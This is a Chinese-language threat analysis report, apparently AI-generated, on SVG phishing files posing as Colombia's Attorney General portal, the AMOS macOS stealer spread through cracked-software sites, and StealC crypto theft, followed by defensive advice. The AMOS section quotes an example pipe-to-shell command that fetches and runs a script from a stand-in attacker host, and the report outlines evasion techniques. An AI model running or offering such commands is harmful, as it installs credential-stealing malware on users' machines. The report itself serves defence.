SVG 钓鱼文件与 AMOS macOS 窃取程序攻击分析报告【红客联盟 AI 分析】

一、报告基础信息

• 情报来源：红客联盟官方门户 | https://www.chnhonker.com/3360.html
• 情报编号：HK-MW-202509053360
• 分析主体：红客联盟 AI 智能安全分析员
• 分析目标：解析 VirusTotal 发现的 SVG 钓鱼文件攻击模式、Atomic macOS Stealer（AMOS）技术特征及关联威胁，为跨平台（Windows/macOS）安全防护提供依据。
• 报告声明：本报告基于 VirusTotal、趋势科技、CyberArk 公开数据，仅供安全防御参考，不构成恶意软件技术指导。

二、核心攻击活动一：SVG 文件用于哥伦比亚司法系统钓鱼

（一）攻击活动概况

• 发现背景：VirusTotal 检测到一批未被防病毒引擎识别的恶意 SVG 文件，截至分析时，共发现44 个独特未检测样本，野外累计传播523 个 SVG 文件，最早样本可追溯至2025 年 8 月 14 日；
• 传播载体：通过电子邮件附件分发，目标群体聚焦哥伦比亚境内用户，利用 “政府司法服务” 信任度降低警惕；
• 攻击目标：伪装成哥伦比亚总检察长办公室（Fiscalía General de la Nación）官方门户网站，诱导用户泄露司法相关敏感信息（如个人身份、案件查询凭证等）。

（二）SVG 文件技术原理与攻击流程

1. 核心技术：嵌入式 JavaScript+Base64 编码
   SVG 文件本身为矢量图形格式，攻击者在其中嵌入恶意 JavaScript 代码，实现 “渲染即执行”：
   • 步骤 1：用户打开 SVG 文件（如邮件附件 “案件通知书.svg”），浏览器 / 图像查看器渲染时自动执行内置 JS；
   • 步骤 2：JS 解码Base64 编码的 HTML 钓鱼页面，在本地生成仿哥伦比亚司法系统的虚假网页，视觉上与官方网站高度一致；
   • 步骤 3：虚假网页模拟 “官方文件下载” 场景，显示动态进度条欺骗用户等待，同时在后台静默解码第二个 Base64 字符串 —— 该字符串对应一个恶意 ZIP 压缩包，强制触发浏览器下载（ZIP 文件具体内容未公开，推测含后续恶意载荷）。
2. 规避检测手段
   攻击者通过三重技术躲避静态扫描，导致 44 个样本 “零检测”：
   • 代码混淆：JS 代码含大量无意义变量名（如 “a1b2c3”）与垃圾代码，干扰安全工具特征提取；
   • 多态性：每个 SVG 文件的 JS 代码结构略有差异（如变量名替换、代码顺序调整），避免单一特征码拦截；
   • 体积优化：早期样本约 25MB（含冗余数据），后期逐步缩减体积，降低 “大文件告警” 概率，显示攻击者持续优化逃避策略。

三、核心攻击活动二：Atomic macOS Stealer（AMOS）针对苹果设备

（一）AMOS 窃取程序定位与危害

• 性质：专门针对macOS 系统的信息窃取程序，打破 “macOS 无恶意软件” 认知，随企业 macOS 设备普及成为攻击热点；
• 核心能力：全方位数据窃取，覆盖企业与个人敏感信息，具体如下：
  • 账户凭据：浏览器保存的密码、VPN 配置文件、加密货币钱包私钥；
  • 个人数据：Telegram 聊天记录、Apple Notes 笔记、钥匙串（Keychain）存储的敏感信息；
  • 文件资产：常用文件夹（如 “文档”“下载”）中的文档、表格、压缩包。

（二）传播渠道与安装规避技术

1. 传播路径：破解软件诱导

• 攻击入口：聚焦提供 “macOS 破解软件” 的网站，以haxmac[.]cc为核心分发平台（该网站伪装成 “Cracked Mac Apps Store”，提供 Adobe 系列、AutoCAD、游戏等破解版下载）；
• 诱导逻辑：用户搜索 “Cyberpunk 2077 破解版”“Adobe Animate 2024 免费版” 等关键词进入网站，被重定向至虚假下载页面，获取 “终端安装指南”。

2. 安装规避：突破 macOS Gatekeeper

• 传统方法失效：macOS 自带的 Gatekeeper 机制默认阻止 “未公证、无开发者签名的.dmg 文件”，AMOS 早期依赖.dmg 传播时感染率低；
• 转向终端安装：攻击者采用 “ClickFix 策略”，引导用户在 macOS 终端运行curl 命令（如curl http://attacker.com/amos.sh | sh），直接从远程服务器下载并执行 AMOS，绕过 Gatekeeper 对.dmg 文件的限制；
• 系统适配：macOS Sequoia（新版系统）增强 Gatekeeper 防护后，攻击者进一步优化终端命令，通过 “动态编译脚本” 避免被系统安全规则拦截。

四、关联威胁活动：StealC 加载器与加密货币盗窃

• 攻击目标：寻找 “游戏作弊工具” 的玩家（如《赛博朋克 2077》《黑手党：终极版》作弊程序）；
• 技术手段：利用StealC 窃取程序的加载器功能，下载并部署 “加密货币窃取模块”；
• 攻击收益：CyberArk 调查显示，该活动已使威胁行为者非法获利超13.5 万美元，主要来自窃取的比特币、以太坊等数字资产；
• 关联逻辑：与 AMOS、SVG 钓鱼共享 “‘高需求资源’诱导” 策略（破解软件→AMOS，作弊工具→StealC，政府服务→SVG 钓鱼），均通过 “用户主动操作” 突破防御。

五、防御建议（跨平台覆盖）

（一）针对 SVG 钓鱼的防御

1. 文件管控：
   • 邮件网关拦截 “SVG 文件附件”，尤其来自哥伦比亚境外、无明确发件人信息的邮件；
   • 终端禁止 “双击打开未知 SVG 文件”，如需查看需通过 “记事本 / 文本编辑器” 先检查是否含嵌入式 JS 代码。
2. 用户培训：
   • 告知哥伦比亚用户 “官方司法系统不会通过 SVG 文件发送‘案件通知书’”，核实链接需手动输入总检察长办公室官网地址（非邮件附件中的链接）；
   • 警惕 “带进度条的文件下载”，官方下载通常来自明确域名（如.gov.co），而非本地 SVG 渲染生成的页面。

（二）针对 AMOS 的 macOS 防御

1. 终端权限管控：
   • 通过 macOS“系统设置→隐私与安全性→终端”，禁用非管理员账户的终端使用权限；
   • 部署 EDR 工具，监控 “终端执行 curl 命令下载未知脚本” 的行为，触发实时告警。
2. 软件来源规范：
   • 禁止企业员工从 haxmac [.] cc 等非官方渠道下载软件，仅允许通过 App Store 或开发商官网获取应用；
   • 启用 macOS“系统完整性保护（SIP）”，防止攻击者通过修改系统文件绕过 Gatekeeper。

（三）通用威胁防御

• 威胁情报联动：订阅 VirusTotal、趋势科技的 IOCs，将 “恶意 SVG 文件哈希”“AMOS 相关域名（如 haxmac [.] cc）”“StealC C2 IP” 加入防火墙黑名单；
• 纵深防御：无论 Windows 还是 macOS，均需结合 “端点防护 + 网络监控 + 用户培训”，不依赖单一系统防护机制。